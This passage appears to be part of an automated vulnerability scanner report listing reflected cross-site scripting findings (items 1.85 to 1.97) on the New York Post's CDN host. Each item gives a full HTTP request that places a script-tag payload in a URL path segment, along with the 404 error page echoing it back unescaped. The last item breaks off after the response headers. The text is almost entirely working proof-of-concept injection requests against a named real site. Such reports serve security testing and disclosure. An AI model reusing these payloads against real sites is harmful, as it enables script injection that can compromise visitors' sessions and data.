1.85. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 383ce<script>alert(1)</script>fd5a2a75630 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js383ce<script>alert(1)</script>fd5a2a75630 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:22 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js383ce<script>alert(1)</script>fd5a2a75630</p>
...[SNIP]...

1.86. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 67680<script>alert(1)</script>80cf6ac3e1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig67680<script>alert(1)</script>80cf6ac3e1e/WebPortal/nypost/scripts/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:50 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig67680<script>alert(1)</script>80cf6ac3e1e/WebPortal/nypost/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.87. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 574d4<script>alert(1)</script>a473b6a72f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal574d4<script>alert(1)</script>a473b6a72f1/nypost/scripts/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:57 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal574d4<script>alert(1)</script>a473b6a72f1/nypost/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.88. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8643b<script>alert(1)</script>e0b51e81287 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost8643b<script>alert(1)</script>e0b51e81287/scripts/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:06 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost8643b<script>alert(1)</script>e0b51e81287/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.89. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8ba5a<script>alert(1)</script>8305c520f94 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts8ba5a<script>alert(1)</script>8305c520f94/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:14 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts8ba5a<script>alert(1)</script>8305c520f94/jquery.dimensions.js</p>
...[SNIP]...

1.90. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 21864<script>alert(1)</script>2f7cd94a064 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js21864<script>alert(1)</script>2f7cd94a064 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js21864<script>alert(1)</script>2f7cd94a064</p>
...[SNIP]...

1.91. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 220e9<script>alert(1)</script>1359c02d889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig220e9<script>alert(1)</script>1359c02d889/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig220e9<script>alert(1)</script>1359c02d889/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.92. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37c80<script>alert(1)</script>4d7a62988b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal37c80<script>alert(1)</script>4d7a62988b0/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:04 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal37c80<script>alert(1)</script>4d7a62988b0/nypost/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.93. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abbe6<script>alert(1)</script>7f61ed691f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostabbe6<script>alert(1)</script>7f61ed691f7/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:12 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostabbe6<script>alert(1)</script>7f61ed691f7/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.94. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b7a5b<script>alert(1)</script>6f8e96b8ffa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsb7a5b<script>alert(1)</script>6f8e96b8ffa/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsb7a5b<script>alert(1)</script>6f8e96b8ffa/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.95. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 232ec<script>alert(1)</script>c3188075af6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js232ec<script>alert(1)</script>c3188075af6 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js232ec<script>alert(1)</script>c3188075af6</p>
...[SNIP]...

1.96. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1efa9<script>alert(1)</script>92506e40b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig1efa9<script>alert(1)</script>92506e40b7a/WebPortal/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:48 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig1efa9<script>alert(1)</script>92506e40b7a/WebPortal/nypost/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.97. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94a89<script>alert(1)</script>34c114d8f35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal94a89<script>alert(1)</script>34c114d8f35/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

